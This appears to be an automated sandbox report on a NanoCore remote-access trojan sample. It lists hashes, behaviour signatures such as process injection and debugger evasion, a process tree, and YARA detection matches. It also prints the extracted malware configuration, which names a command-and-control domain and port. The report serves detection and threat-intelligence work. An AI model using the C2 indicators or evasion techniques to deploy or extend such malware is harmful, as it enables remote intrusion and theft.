Edit tour

Windows Analysis Report
xeWd55M5Lb

Overview

General Information

Sample Name:	xeWd55M5Lb (renamed file extension from none to exe)
Analysis ID:	628188
MD5:	f32d1f6e94da654932e73e42f0f4773a
SHA1:	04e51bb4dedfc85cb6d4dfceb3bf48bf69c2a58a
SHA256:	43f670b439ef8ea9765ef3a61e84f1997e3dfd30067dc11c3203caf258553398
Tags:	32exe
Infos:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Sigma detected: NanoCore

Detected Nanocore Rat

Multi AV Scanner detection for dropped file

Yara detected Nanocore RAT

Snort IDS alert for network traffic

Machine Learning detection for sample

Injects a PE file into a foreign processes

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses dynamic DNS services

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

One or more processes crash

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Extensive use of GetProcAddress (often used to hide API calls)

Drops PE files

Contains functionality to read the PEB

Detected TCP or UDP traffic on non-standard ports

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

xeWd55M5Lb.exe (PID: 6384 cmdline: "C:\Users\user\Desktop\xeWd55M5Lb.exe" MD5: F32D1F6E94DA654932E73E42F0F4773A)

jqenyeo.exe (PID: 6412 cmdline: C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk MD5: 22A5EC1E72CE0D23B1598C40639BB3B2)

conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

jqenyeo.exe (PID: 6500 cmdline: C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk MD5: 22A5EC1E72CE0D23B1598C40639BB3B2)

ltqmdmdi.exe (PID: 6696 cmdline: "C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe" MD5: 22A5EC1E72CE0D23B1598C40639BB3B2)

conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WerFault.exe (PID: 7004 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6696 -s 628 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

ltqmdmdi.exe (PID: 5948 cmdline: "C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe" MD5: 22A5EC1E72CE0D23B1598C40639BB3B2)

conhost.exe (PID: 5420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WerFault.exe (PID: 4588 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "b07368c6-c9e6-43bc-939d-00b8dbf6", "Group": "Memphis", "Domain1": "stonecold.ddns.net", "Domain2": "stonecold.ddns.net", "Port": 2702, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x101e5:$x1: NanoCore.ClientPluginHost 0x10222:$x2: IClientNetworkHost 0x13d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xff4d:$a: NanoCore 0xff5d:$a: NanoCore 0x10191:$a: NanoCore 0x101a5:$a: NanoCore 0x101e5:$a: NanoCore 0xffac:$b: ClientPlugin 0x101ae:$b: ClientPlugin 0x101ee:$b: ClientPlugin 0x100d3:$c: ProjectData 0x10ada:$d: DESCrypto 0x184a6:$e: KeepAlive 0x16494:$g: LogClientMessage 0x1268f:$i: get_Connected 0x10e10:$j: #=q 0x10e40:$j: #=q 0x10e5c:$j: #=q 0x10e8c:$j: #=q 0x10ea8:$j: #=q 0x10ec4:$j: #=q 0x10ef4:$j: #=q 0x10f10:$j: #=q
00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x101e5:$x1: NanoCore.ClientPluginHost 0x10222:$x2: IClientNetworkHost 0x13d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xff4d:$a: NanoCore 0xff5d:$a: NanoCore 0x10191:$a: NanoCore 0x101a5:$a: NanoCore 0x101e5:$a: NanoCore 0xffac:$b: ClientPlugin 0x101ae:$b: ClientPlugin 0x101ee:$b: ClientPlugin 0x100d3:$c: ProjectData 0x10ada:$d: DESCrypto 0x184a6:$e: KeepAlive 0x16494:$g: LogClientMessage 0x1268f:$i: get_Connected 0x10e10:$j: #=q 0x10e40:$j: #=q 0x10e5c:$j: #=q 0x10e8c:$j: #=q 0x10ea8:$j: #=q 0x10ec4:$j: #=q 0x10ef4:$j: #=q 0x10f10:$j: #=q
00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x217e5:$x1: NanoCore.ClientPluginHost 0x21822:$x2: IClientNetworkHost 0x25355:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2155d:$x1: NanoCore Client.exe 0x217e5:$x2: NanoCore.ClientPluginHost 0x22e1e:$s1: PluginCommand 0x22e12:$s2: FileCommand 0x23cc3:$s3: PipeExists 0x29a7a:$s4: PipeCreated 0x2180f:$s5: IClientLoggingHost
00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x2154d:$x1: NanoCore Client 0x2155d:$x1: NanoCore Client 0x217a5:$x2: NanoCore.ClientPlugin 0x217e5:$x3: NanoCore.ClientPluginHost 0x2179a:$i1: IClientApp 0x217bb:$i2: IClientData 0x217c7:$i3: IClientNetwork 0x217d6:$i4: IClientAppHost 0x217ff:$i5: IClientDataHost 0x2180f:$i6: IClientLoggingHost 0x21822:$i7: IClientNetworkHost 0x21835:$i8: IClientUIHost 0x21843:$i9: IClientNameObjectCollection 0x2185f:$i10: IClientReadOnlyNameObjectCollection 0x215ac:$s1: ClientPlugin 0x217ae:$s1: ClientPlugin 0x21ca2:$s2: EndPoint 0x21cab:$s3: IPAddress 0x21cb5:$s4: IPEndPoint 0x236eb:$s6: get_ClientSettings 0x23c8f:$s7: get_Connected
00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2154d:$a: NanoCore 0x2155d:$a: NanoCore 0x21791:$a: NanoCore 0x217a5:$a: NanoCore 0x217e5:$a: NanoCore 0x215ac:$b: ClientPlugin 0x217ae:$b: ClientPlugin 0x217ee:$b: ClientPlugin 0x216d3:$c: ProjectData 0x220da:$d: DESCrypto 0x29aa6:$e: KeepAlive 0x27a94:$g: LogClientMessage 0x23c8f:$i: get_Connected 0x22410:$j: #=q 0x22440:$j: #=q 0x2245c:$j: #=q 0x2248c:$j: #=q 0x224a8:$j: #=q 0x224c4:$j: #=q 0x224f4:$j: #=q 0x22510:$j: #=q
Process Memory Space: jqenyeo.exe PID: 6412	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xc4e33:$x1: NanoCore.ClientPluginHost 0xc4e70:$x2: IClientNetworkHost 0xc8961:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xd39a0:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: jqenyeo.exe PID: 6412	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: jqenyeo.exe PID: 6412	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xc4b00:$a: NanoCore 0xc4b10:$a: NanoCore 0xc4bcf:$a: NanoCore 0xc4bde:$a: NanoCore 0xc4ddf:$a: NanoCore 0xc4df3:$a: NanoCore 0xc4e33:$a: NanoCore 0xd000a:$a: NanoCore 0xd001c:$a: NanoCore 0xd0058:$a: NanoCore 0xc4b5f:$b: ClientPlugin 0xc4c28:$b: ClientPlugin 0xc4dfc:$b: ClientPlugin 0xc4e3c:$b: ClientPlugin 0xd0025:$b: ClientPlugin 0xd0061:$b: ClientPlugin 0xc4d21:$c: ProjectData 0xcff57:$c: ProjectData 0xc56f5:$d: DESCrypto 0xd08b5:$d: DESCrypto 0xcd0b2:$e: KeepAlive
Process Memory Space: jqenyeo.exe PID: 6500	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6efd7:$x1: NanoCore.ClientPluginHost 0x6f014:$x2: IClientNetworkHost 0x72b05:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x7db8b:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: jqenyeo.exe PID: 6500	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: jqenyeo.exe PID: 6500	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2a475:$a: NanoCore 0x2a4f7:$a: NanoCore 0x2a508:$a: NanoCore 0x4187f:$a: NanoCore 0x426b8:$a: NanoCore 0x426d3:$a: NanoCore 0x42747:$a: NanoCore 0x5e929:$a: NanoCore 0x6eca4:$a: NanoCore 0x6ecb4:$a: NanoCore 0x6ed73:$a: NanoCore 0x6ed82:$a: NanoCore 0x6ef83:$a: NanoCore 0x6ef97:$a: NanoCore 0x6efd7:$a: NanoCore 0x7a1f5:$a: NanoCore 0x7a207:$a: NanoCore 0x7a243:$a: NanoCore 0x87a56:$a: NanoCore 0xcc546:$a: NanoCore 0xe4ba8:$a: NanoCore
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.0.jqenyeo.exe.400000.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x217e5:$x1: NanoCore.ClientPluginHost 0x21822:$x2: IClientNetworkHost 0x25355:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.0.jqenyeo.exe.400000.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2155d:$x1: NanoCore Client.exe 0x217e5:$x2: NanoCore.ClientPluginHost 0x22e1e:$s1: PluginCommand 0x22e12:$s2: FileCommand 0x23cc3:$s3: PipeExists 0x29a7a:$s4: PipeCreated 0x2180f:$s5: IClientLoggingHost
3.0.jqenyeo.exe.400000.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.0.jqenyeo.exe.400000.4.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x2154d:$x1: NanoCore Client 0x2155d:$x1: NanoCore Client 0x217a5:$x2: NanoCore.ClientPlugin 0x217e5:$x3: NanoCore.ClientPluginHost 0x2179a:$i1: IClientApp 0x217bb:$i2: IClientData 0x217c7:$i3: IClientNetwork 0x217d6:$i4: IClientAppHost 0x217ff:$i5: IClientDataHost 0x2180f:$i6: IClientLoggingHost 0x21822:$i7: IClientNetworkHost 0x21835:$i8: IClientUIHost 0x21843:$i9: IClientNameObjectCollection 0x2185f:$i10: IClientReadOnlyNameObjectCollection 0x215ac:$s1: ClientPlugin 0x217ae:$s1: ClientPlugin 0x21ca2:$s2: EndPoint 0x21cab:$s3: IPAddress 0x21cb5:$s4: IPEndPoint 0x236eb:$s6: get_ClientSettings 0x23c8f:$s7: get_Connected
3.0.jqenyeo.exe.400000.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2154d:$a: NanoCore 0x2155d:$a: NanoCore 0x21791:$a: NanoCore 0x217a5:$a: NanoCore 0x217e5:$a: NanoCore 0x215ac:$b: ClientPlugin 0x217ae:$b: ClientPlugin 0x217ee:$b: ClientPlugin 0x216d3:$c: ProjectData 0x220da:$d: DESCrypto 0x29aa6:$e: KeepAlive 0x27a94:$g: LogClientMessage 0x23c8f:$i: get_Connected 0x22410:$j: #=q 0x22440:$j: #=q 0x2245c:$j: #=q 0x2248c:$j: #=q 0x224a8:$j: #=q 0x224c4:$j: #=q 0x224f4:$j: #=q 0x22510:$j: #=q
1.2.jqenyeo.exe.21b0000.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1ede5:$x1: NanoCore.ClientPluginHost 0x1ee22:$x2: IClientNetworkHost 0x22955:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.jqenyeo.exe.21b0000.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1eb5d:$x1: NanoCore Client.exe 0x1ede5:$x2: NanoCore.ClientPluginHost 0x2041e:$s1: PluginCommand 0x20412:$s2: FileCommand 0x212c3:$s3: PipeExists 0x2707a:$s4: PipeCreated 0x1ee0f:$s5: IClientLoggingHost
1.2.jqenyeo.exe.21b0000.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.jqenyeo.exe.21b0000.2.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x1eb4d:$x1: NanoCore Client 0x1eb5d:$x1: NanoCore Client 0x1eda5:$x2: NanoCore.ClientPlugin 0x1ede5:$x3: NanoCore.ClientPluginHost 0x1ed9a:$i1: IClientApp 0x1edbb:$i2: IClientData 0x1edc7:$i3: IClientNetwork 0x1edd6:$i4: IClientAppHost 0x1edff:$i5: IClientDataHost 0x1ee0f:$i6: IClientLoggingHost 0x1ee22:$i7: IClientNetworkHost 0x1ee35:$i8: IClientUIHost 0x1ee43:$i9: IClientNameObjectCollection 0x1ee5f:$i10: IClientReadOnlyNameObjectCollection 0x1ebac:$s1: ClientPlugin 0x1edae:$s1: ClientPlugin 0x1f2a2:$s2: EndPoint 0x1f2ab:$s3: IPAddress 0x1f2b5:$s4: IPEndPoint 0x20ceb:$s6: get_ClientSettings 0x2128f:$s7: get_Connected
1.2.jqenyeo.exe.21b0000.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1eb4d:$a: NanoCore 0x1eb5d:$a: NanoCore 0x1ed91:$a: NanoCore 0x1eda5:$a: NanoCore 0x1ede5:$a: NanoCore 0x1ebac:$b: ClientPlugin 0x1edae:$b: ClientPlugin 0x1edee:$b: ClientPlugin 0x1ecd3:$c: ProjectData 0x1f6da:$d: DESCrypto 0x270a6:$e: KeepAlive 0x25094:$g: LogClientMessage 0x2128f:$i: get_Connected 0x1fa10:$j: #=q 0x1fa40:$j: #=q 0x1fa5c:$j: #=q 0x1fa8c:$j: #=q 0x1faa8:$j: #=q 0x1fac4:$j: #=q 0x1faf4:$j: #=q 0x1fb10:$j: #=q
1.2.jqenyeo.exe.21c1658.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.jqenyeo.exe.21c1658.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
1.2.jqenyeo.exe.21c1658.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.jqenyeo.exe.21c1658.1.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x10163:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost 0x101dd:$i8: IClientUIHost 0x101eb:$i9: IClientNameObjectCollection 0x10207:$i10: IClientReadOnlyNameObjectCollection 0xff54:$s1: ClientPlugin 0x10156:$s1: ClientPlugin 0x1064a:$s2: EndPoint 0x10653:$s3: IPAddress 0x1065d:$s4: IPEndPoint 0x12093:$s6: get_ClientSettings 0x12637:$s7: get_Connected
1.2.jqenyeo.exe.21c1658.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
3.0.jqenyeo.exe.400000.8.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x217e5:$x1: NanoCore.ClientPluginHost 0x21822:$x2: IClientNetworkHost 0x25355:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.0.jqenyeo.exe.400000.8.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2155d:$x1: NanoCore Client.exe 0x217e5:$x2: NanoCore.ClientPluginHost 0x22e1e:$s1: PluginCommand 0x22e12:$s2: FileCommand 0x23cc3:$s3: PipeExists 0x29a7a:$s4: PipeCreated 0x2180f:$s5: IClientLoggingHost
3.0.jqenyeo.exe.400000.8.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.0.jqenyeo.exe.400000.8.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x2154d:$x1: NanoCore Client 0x2155d:$x1: NanoCore Client 0x217a5:$x2: NanoCore.ClientPlugin 0x217e5:$x3: NanoCore.ClientPluginHost 0x2179a:$i1: IClientApp 0x217bb:$i2: IClientData 0x217c7:$i3: IClientNetwork 0x217d6:$i4: IClientAppHost 0x217ff:$i5: IClientDataHost 0x2180f:$i6: IClientLoggingHost 0x21822:$i7: IClientNetworkHost 0x21835:$i8: IClientUIHost 0x21843:$i9: IClientNameObjectCollection 0x2185f:$i10: IClientReadOnlyNameObjectCollection 0x215ac:$s1: ClientPlugin 0x217ae:$s1: ClientPlugin 0x21ca2:$s2: EndPoint 0x21cab:$s3: IPAddress 0x21cb5:$s4: IPEndPoint 0x236eb:$s6: get_ClientSettings 0x23c8f:$s7: get_Connected
3.0.jqenyeo.exe.400000.8.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2154d:$a: NanoCore 0x2155d:$a: NanoCore 0x21791:$a: NanoCore 0x217a5:$a: NanoCore 0x217e5:$a: NanoCore 0x215ac:$b: ClientPlugin 0x217ae:$b: ClientPlugin 0x217ee:$b: ClientPlugin 0x216d3:$c: ProjectData 0x220da:$d: DESCrypto 0x29aa6:$e: KeepAlive 0x27a94:$g: LogClientMessage 0x23c8f:$i: get_Connected 0x22410:$j: #=q 0x22440:$j: #=q 0x2245c:$j: #=q 0x2248c:$j: #=q 0x224a8:$j: #=q 0x224c4:$j: #=q 0x224f4:$j: #=q 0x22510:$j: #=q
1.2.jqenyeo.exe.21b0000.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x217e5:$x1: NanoCore.ClientPluginHost 0x21822:$x2: IClientNetworkHost 0x25355:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.jqenyeo.exe.21b0000.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2155d:$x1: NanoCore Client.exe 0x217e5:$x2: NanoCore.ClientPluginHost 0x22e1e:$s1: PluginCommand 0x22e12:$s2: FileCommand 0x23cc3:$s3: PipeExists 0x29a7a:$s4: PipeCreated 0x2180f:$s5: IClientLoggingHost
1.2.jqenyeo.exe.21b0000.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.jqenyeo.exe.21b0000.2.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x2154d:$x1: NanoCore Client 0x2155d:$x1: NanoCore Client 0x217a5:$x2: NanoCore.ClientPlugin 0x217e5:$x3: NanoCore.ClientPluginHost 0x2179a:$i1: IClientApp 0x217bb:$i2: IClientData 0x217c7:$i3: IClientNetwork 0x217d6:$i4: IClientAppHost 0x217ff:$i5: IClientDataHost 0x2180f:$i6: IClientLoggingHost 0x21822:$i7: IClientNetworkHost 0x21835:$i8: IClientUIHost 0x21843:$i9: IClientNameObjectCollection 0x2185f:$i10: IClientReadOnlyNameObjectCollection 0x215ac:$s1: ClientPlugin 0x217ae:$s1: ClientPlugin 0x21ca2:$s2: EndPoint 0x21cab:$s3: IPAddress 0x21cb5:$s4: IPEndPoint 0x236eb:$s6: get_ClientSettings 0x23c8f:$s7: get_Connected
1.2.jqenyeo.exe.21b0000.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2154d:$a: NanoCore 0x2155d:$a: NanoCore 0x21791:$a: NanoCore 0x217a5:$a: NanoCore 0x217e5:$a: NanoCore 0x215ac:$b: ClientPlugin 0x217ae:$b: ClientPlugin 0x217ee:$b: ClientPlugin 0x216d3:$c: ProjectData 0x220da:$d: DESCrypto 0x29aa6:$e: KeepAlive 0x27a94:$g: LogClientMessage 0x23c8f:$i: get_Connected 0x22410:$j: #=q 0x22440:$j: #=q 0x2245c:$j: #=q 0x2248c:$j: #=q 0x224a8:$j: #=q 0x224c4:$j: #=q 0x224f4:$j: #=q 0x22510:$j: #=q
3.0.jqenyeo.exe.400000.9.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x217e5:$x1: NanoCore.ClientPluginHost 0x21822:$x2: IClientNetworkHost 0x25355:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.0.jqenyeo.exe.400000.9.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2155d:$x1: NanoCore Client.exe 0x217e5:$x2: NanoCore.ClientPluginHost 0x22e1e:$s1: PluginCommand 0x22e12:$s2: FileCommand 0x23cc3:$s3: PipeExists 0x29a7a:$s4: PipeCreated 0x2180f:$s5: IClientLoggingHost
3.0.jqenyeo.exe.400000.9.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.0.jqenyeo.exe.400000.9.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x2154d:$x1: NanoCore Client 0x2155d:$x1: NanoCore Client 0x217a5:$x2: NanoCore.ClientPlugin 0x217e5:$x3: NanoCore.ClientPluginHost 0x2179a:$i1: IClientApp 0x217bb:$i2: IClientData 0x217c7:$i3: IClientNetwork 0x217d6:$i4: IClientAppHost 0x217ff:$i5: IClientDataHost 0x2180f:$i6: IClientLoggingHost 0x21822:$i7: IClientNetworkHost 0x21835:$i8: IClientUIHost 0x21843:$i9: IClientNameObjectCollection 0x2185f:$i10: IClientReadOnlyNameObjectCollection 0x215ac:$s1: ClientPlugin 0x217ae:$s1: ClientPlugin 0x21ca2:$s2: EndPoint 0x21cab:$s3: IPAddress 0x21cb5:$s4: IPEndPoint 0x236eb:$s6: get_ClientSettings 0x23c8f:$s7: get_Connected
3.0.jqenyeo.exe.400000.9.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2154d:$a: NanoCore 0x2155d:$a: NanoCore 0x21791:$a: NanoCore 0x217a5:$a: NanoCore 0x217e5:$a: NanoCore 0x215ac:$b: ClientPlugin 0x217ae:$b: ClientPlugin 0x217ee:$b: ClientPlugin 0x216d3:$c: ProjectData 0x220da:$d: DESCrypto 0x29aa6:$e: KeepAlive 0x27a94:$g: LogClientMessage 0x23c8f:$i: get_Connected 0x22410:$j: #=q 0x22440:$j: #=q 0x2245c:$j: #=q 0x2248c:$j: #=q 0x224a8:$j: #=q 0x224c4:$j: #=q 0x224f4:$j: #=q 0x22510:$j: #=q
1.2.jqenyeo.exe.21c1658.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.jqenyeo.exe.21c1658.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
1.2.jqenyeo.exe.21c1658.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
